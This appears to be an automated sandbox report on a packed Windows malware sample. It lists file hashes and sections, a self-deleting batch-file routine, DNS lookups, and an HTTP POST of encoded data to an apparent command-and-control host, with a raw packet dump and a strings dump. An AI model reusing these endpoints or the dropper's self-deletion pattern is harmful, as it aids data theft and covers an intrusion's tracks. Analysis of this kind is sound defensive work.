Analysis Date2014-08-25 15:01:12
MD509e25c6a03ff716999f7894e7bdb73d3
SHA1aa0ea9e69db511b8e17d76017ab063af96144c5b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.qLawXP md5: 4913119bd211773391483c9d69d65f54 sha1: cdb00f25c927499dde6ed3a23d86929f2598dd87 size: 16384
Section.RNwPz md5: 739eb35e869ba635d11be33f08edf6a6 sha1: 9c2cf1489f30de4ee360605c54cf725e51a785e1 size: 29184
Section.afyh md5: 21eb7229dde310fab9cd2dbec6208123 sha1: df728df8c047ff7589d48aaa00c65cd88d0550c5 size: 7168
Section.CuzShI md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Section.HUnns md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Section.rsrc md5: ca9ccc2ebba0bd5252bfbed45529284b sha1: e2323752e335357ef6277bddef06ae44059ae084 size: 1024
Timestamp2008-07-20 18:22:54
PackerSafeguard 1.03 -> Simonzh
PEhash6f8772629912c47a67fa7677157f9cf064a12d5c
IMPhash8474298a3497aeaba48dd2918737e704

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates ProcessC:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates Filenul
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Deletes FileC:\malware.exe

Network Details:

DNSreportsystem32.com
Type: A
208.73.211.174
DNSreportsystem32.com
Type: A
208.73.211.233
DNSreportsystem32.com
Type: A
208.73.211.235
DNSreportsystem32.com
Type: A
208.73.211.246
DNSreportsystem32.com
Type: A
208.73.210.219
DNSterradataweb.com
Type: A
DNSdvdisorapid.com
Type: A
HTTP POSThttp://reportsystem32.com/senm.php?data=v22MyTS3QIzyWmdivlZDFrtobLbmd4E7b4JZHHciKhpSXlXSjBXcnjr3VFrHIQqMgMqV7JkUfg==
User-Agent: wget 3.0
Flows TCP192.168.1.1:1031 ➝ 208.73.211.174:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7365 6e6d2e70 68703f64   POST /senm.php?d
0x00000010 (00016)   6174613d 7632324d 79545333 51497a79   ata=v22MyTS3QIzy
0x00000020 (00032)   576d6469 766c5a44 4672746f 624c626d   WmdivlZDFrtobLbm
0x00000030 (00048)   64344537 62344a5a 48486369 4b687053   d4E7b4JZHHciKhpS
0x00000040 (00064)   586c5853 6a425863 6e6a7233 56467248   XlXSjBXcnjr3VFrH
0x00000050 (00080)   4951714d 674d7156 374a6b55 66673d3d   IQqMgMqV7JkUfg==
0x00000060 (00096)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000070 (00112)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000080 (00128)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000090 (00144)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000a0 (00160)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000b0 (00176)   656e743a 20776765 7420332e 300d0a48   ent: wget 3.0..H
0x000000c0 (00192)   6f73743a 20726570 6f727473 79737465   ost: reportsyste
0x000000d0 (00208)   6d33322e 636f6d0d 0a436f6e 74656e74   m32.com..Content
0x000000e0 (00224)   2d4c656e 6774683a 2033330d 0a436f6e   -Length: 33..Con
0x000000f0 (00240)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000100 (00256)   6976650d 0a436163 68652d43 6f6e7472   ive..Cache-Contr
0x00000110 (00272)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000120 (00288)   64617461 3d756a6e 5433324f 2f463971   data=ujnT32O/F9q
0x00000130 (00304)   73447941 7a36566c 4d533735 33502f55   sDyAz6VlMS753P/U
0x00000140 (00320)   3d                                    =


Strings
.
.P J
..
..
jF+[
0g*&NI
1Q}Z7l"
_1$yeVU
2ImageList_DragMove
:3&T*w	+
3yI8	Q=
4|2P}`q
.#4>nfFPP
)_4+ZN~
#/*5}5
5DialogBoxParamW
}^5dMF	
5kP7%nPs
-7gP-p
7QYjBv
8^9`DS
8Mz<_/
9ImageList_DragShowNolock
a`' 7x
advapi32.dll
a#Lf!eV>
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
bBlockInput
BGetCursor
bO;(~aL l
{c/2YB
CalcMenuBar
[:\cap
]c-Hiu
CNCopyRect
comctl32.dll
CopyImage
cpR;+6EzE
.CuzShI
\(_d@7
deb2l=
/dnpTC
DrawTextW
dxionn
dxyq8L
E)lJhi7
F3RegQueryValueA
f$9&e*
@fCo.l&
%fGetDlgItem
F GetStdHandle
FreeLibrary
Fr `OF
FT^qRx
-fz1:8
(gC:ET
gChT\(2
GetCommandLineA
GetCPInfo
GetFileSize
GetFileType
GetLastError
;GetLocalTime
GF]1eg
GlobalFree
gVE5:/
!??gW&p
HAyEnnn
HeapAlloc
hF~#R\
HO7B}2
@.HUnns
hvq{vO
i2~mS!Y
i`lh)t'
ImageList_AddIcon
ImageList_BeginDrag
"&ImageList_Copy
ImageList_Destroy
ImageList_EndDrag
:ImageList_GetDragImage
!ImageList_GetIcon
ImageList_GetImageInfo
ImageList_LoadImage
ImageList_LoadImageW
ImageList_Merge
ImageList_Read
& ImageList_Replace
ImageList_ReplaceIcon
InsertMenuA
IRegEnumKeyA
IsMenu
J)hA]R
JUGetWindowTextA
^|K&,)
%Kc @l
kDrawIcon
kernel32.dll
}k?_p$
Kqm8.GB
k</U'%
{}L7=2SF23
*LoadCursorA
(LoadMenuA
"lstrcatA
lstrcmpA
lstrcpyA
lstrcpynA
lstrlenA
M}22KC
MDDQ<.
}MeCjp
*noU*n
|:npDt
nuUnc5
;;N#/wI
^'O4LRfNPS
ODialogBoxParamA
pdW@F>~
Por:BU[
P]$'rTjl
ps50Hq
@P!;V'
PZ(^pB
q:=}+>
Q3q)I8
;+q:5Oj
*q=?60+
.qLawXP
qMIE8s
?,qU>i
qvb	:V
qvxmu<X
@?Q"*ZQ
 &R\\~
*r8U<G
R+A&xM!
RegCreateKeyExA
RegCreateKeyExW
RegDeleteKeyA
[RegDeleteKeyW
RegDeleteValueA
RegEnumKeyExA
RegEnumKeyExW
RegEnumKeyW
RegFlushKey
RegOpenKeyA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
{RegQueryValueExW
RegReplaceKeyA
RegReplaceKeyW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
RhfgZP
R>J'wwD
`.RNwPz
@.rsrc
Rt,_B#
S3mz*;
s,*7)UU
~Sb<|&
}S*>+bl
      </security>
      <security>
>Sleep
"~SxzU
sY<Kdb
-T;DPI
!This program cannot be run in DOS mode.
tmP=~nm
t'N8*@
*TP~5XJ'
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
TW+f=0
UDux6j
uGetStringTypeA
ur+F+	
user32.dll
^uW'gT
v|KEr!
VRAppendMenuW
vv|??&x
Vz4^6L
wBuBH	y
W_"FAG
w@[F@)T$
wHyTr[+
#wI{;{
WideCharToMultiByte
*wN4_g
\x/`!!
x3nnnyW
x^!6`w
+X&E'nm
xjonnHA
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
XRJQ>,
Xy]nnn
YDeleteFileA
y!Jejy2]
yo7_$r-
'Y-O/ZI
Z70yd^